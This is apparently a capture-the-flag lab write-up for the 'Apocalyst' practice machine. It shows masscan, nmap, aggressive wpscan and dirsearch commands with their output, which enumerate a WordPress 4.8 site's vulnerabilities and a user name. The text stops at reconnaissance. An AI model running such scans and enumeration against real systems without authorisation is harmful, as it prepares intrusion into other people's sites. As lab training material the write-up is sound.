Apocalyst

From Luniwiki
Jump to: navigation, search

Back

Apocalyst01.png

Ports scan

u505@kali:~/HTB/Machines/Apocalyst$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.46

Starting masscan 1.0.5 at 2020-05-12 11:05:35 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.46 Discovered open port 80/tcp on 10.10.10.46
u505@kali:~/HTB/Machines/Apocalyst$ nmap -sC -sV 10.10.10.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 07:05 EDT
Nmap scan report for apocalyst.htb (10.10.10.46)
Host is up (0.042s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
|   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apocalypse Preparation Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds

Web Server

Apocalyst02.png

The web server presents a wordpress blog about the apocalypse.

Wpscan

u505@kali:~/HTB/Machines/Apocalyst$ wpscan --url http://10.10.10.46 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <AP token>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://10.10.10.46/ [10.10.10.46] [+] Started: Tue May 12 07:10:12 2020
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://10.10.10.46/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.46/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.46/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.46/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08). | Found By: Atom Generator (Aggressive Detection) | - http://10.10.10.46/?feed=atom, <generator uri="https://wordpress.org/" version="4.8">WordPress</generator> | Confirmed By: Style Etag (Aggressive Detection) | - http://10.10.10.46/wp-admin/load-styles.php, Match: '4.8' | | [!] 43 vulnerabilities identified: | | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8905 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48 | - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec | | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41398 | | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41457 | - https://hackerone.com/reports/205481 | | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41397 | | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41448 | | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor | Fixed in: 4.8.2 | References: | - https://wpvulndb.com/vulnerabilities/8914 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726 | - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/changeset/41395 | - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html | | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset | References: | - https://wpvulndb.com/vulnerabilities/8807 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295 | - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html | - https://core.trac.wordpress.org/ticket/25239 | | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness | Fixed in: 4.8.3 | References: | - https://wpvulndb.com/vulnerabilities/8941 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510 | - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/ | - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d | - https://twitter.com/ircmaxell/status/923662170092638208 | - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html | | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8966 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509 | | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8967 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de | | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8968 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a | | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing | Fixed in: 4.8.4 | References: | - https://wpvulndb.com/vulnerabilities/8969 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091 | - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c | | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS) | Fixed in: 4.8.5 | References: | - https://wpvulndb.com/vulnerabilities/9006 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263 | - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850 | - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/42720 | | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched) | References: | - https://wpvulndb.com/vulnerabilities/9021 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 | - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html | - https://github.com/quitten/doser.py | - https://thehackernews.com/2018/02/wordpress-dos-exploit.html | | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9053 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216 | | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9054 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e | | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag | Fixed in: 4.8.6 | References: | - https://wpvulndb.com/vulnerabilities/9055 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102 | - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d | | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion | Fixed in: 4.8.7 | References: | - https://wpvulndb.com/vulnerabilities/9100 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895 | - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ | - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ | - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd | - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/ | - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/ | | [!] Title: WordPress <= 5.0 - Authenticated File Delete | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9169 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9170 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/ | | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9171 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS) | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9172 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9173 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460 | | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9174 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers | Fixed in: 4.8.8 | References: | - https://wpvulndb.com/vulnerabilities/9175 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149 | - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/ | - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a | | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution | Fixed in: 5.0.1 | References: | - https://wpvulndb.com/vulnerabilities/9222 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943 | - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ | - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce | | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS) | Fixed in: 4.8.9 | References: | - https://wpvulndb.com/vulnerabilities/9230 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787 | - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b | - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/ | - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ | | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation | Fixed in: 4.8.10 | References: | - https://wpvulndb.com/vulnerabilities/9867 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222 | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68 | - https://hackerone.com/reports/339483 | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9908 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9909 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation | Fixed in: 4.8.11 | References: | - https://wpvulndb.com/vulnerabilities/9913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API | Fixed in: 4.8.12 | References: | - https://wpvulndb.com/vulnerabilities/9973 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw | | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links | Fixed in: 4.8.12 | References: | - https://wpvulndb.com/vulnerabilities/9975 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://hackerone.com/reports/509930 | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7 | | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content | Fixed in: 4.8.12 | References: | - https://wpvulndb.com/vulnerabilities/9976 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v | | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass | Fixed in: 4.8.12 | References: | - https://wpvulndb.com/vulnerabilities/10004 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53 | | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated | Fixed in: 4.8.13 | References: | - https://wpvulndb.com/vulnerabilities/10201 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47634/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw | | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts | Fixed in: 4.8.13 | References: | - https://wpvulndb.com/vulnerabilities/10202 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47635/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w | | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer | Fixed in: 4.8.13 | References: | - https://wpvulndb.com/vulnerabilities/10203 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47633/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c | | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache | Fixed in: 4.8.13 | References: | - https://wpvulndb.com/vulnerabilities/10205 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47637/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c | | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads | Fixed in: 4.8.13 | References: | - https://wpvulndb.com/vulnerabilities/10206 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47638/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Aggressive Methods) Checking Known Locations - Time: 00:00:03 <> (328 / 328) 100.00% Time: 00:00:03 [+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen | Location: http://10.10.10.46/wp-content/themes/twentyfifteen/ | Latest Version: 2.6 | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://10.10.10.46/wp-content/themes/twentyfifteen/readme.txt | Style URL: http://10.10.10.46/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer. | Author: the WordPress team | Author URI: https://wordpress.org/ | License: GNU General Public License v2 or later | License URI: http://www.gnu.org/licenses/gpl-2.0.html | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready | Text Domain: twentyfifteen | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.46/wp-content/themes/twentyfifteen/, status: 500 | | [!] 1 vulnerability identified: | | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS) | Fixed in: 1.2 | References: | - https://wpvulndb.com/vulnerabilities/7965 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429 | - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html | - https://packetstormsecurity.com/files/131802/ | - https://seclists.org/fulldisclosure/2015/May/41 | | The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods) Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods) Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:00 <> (0 / 100) 0.00% ETA: ??:??:? Brute Forcing Attachment IDs - Time: 00:00:00 <> (1 / 100) 1.00% ETA: 00:00:1 Brute Forcing Attachment IDs - Time: 00:00:00 <> (2 / 100) 2.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (6 / 100) 6.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (7 / 100) 7.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (11 / 100) 11.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (12 / 100) 12.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (17 / 100) 17.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (22 / 100) 22.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (27 / 100) 27.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (32 / 100) 32.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (37 / 100) 37.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (42 / 100) 42.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (47 / 100) 47.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (52 / 100) 52.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (57 / 100) 57.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (62 / 100) 62.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (67 / 100) 67.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (72 / 100) 72.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (73 / 100) 73.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (77 / 100) 77.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (78 / 100) 78.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (83 / 100) 83.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (88 / 100) 88.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (93 / 100) 93.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (98 / 100) 98.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (100 / 100) 100.00% Time: 00:00:02
[i] Medias(s) Identified:
[+] http://10.10.10.46/?attachment_id=11 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.46/?attachment_id=12 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] falaraki | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 2 | Requests Remaining: 48
[+] Finished: Tue May 12 07:10:25 2020 [+] Requests Done: 541 [+] Cached Requests: 7 [+] Data Sent: 122.1 KB [+] Data Received: 487.258 KB [+] Memory used: 246.188 MB [+] Elapsed time: 00:00:12

The more relevant information is the username.

Dirsearch

u505@kali:~/HTB/Machines/Apocalyst$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 1000 -u http://10.10.10.46
 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 9189
Error Log: /opt/utils/dirsearch/logs/errors-20-05-12_07-42-44.log
Target: http://10.10.10.46
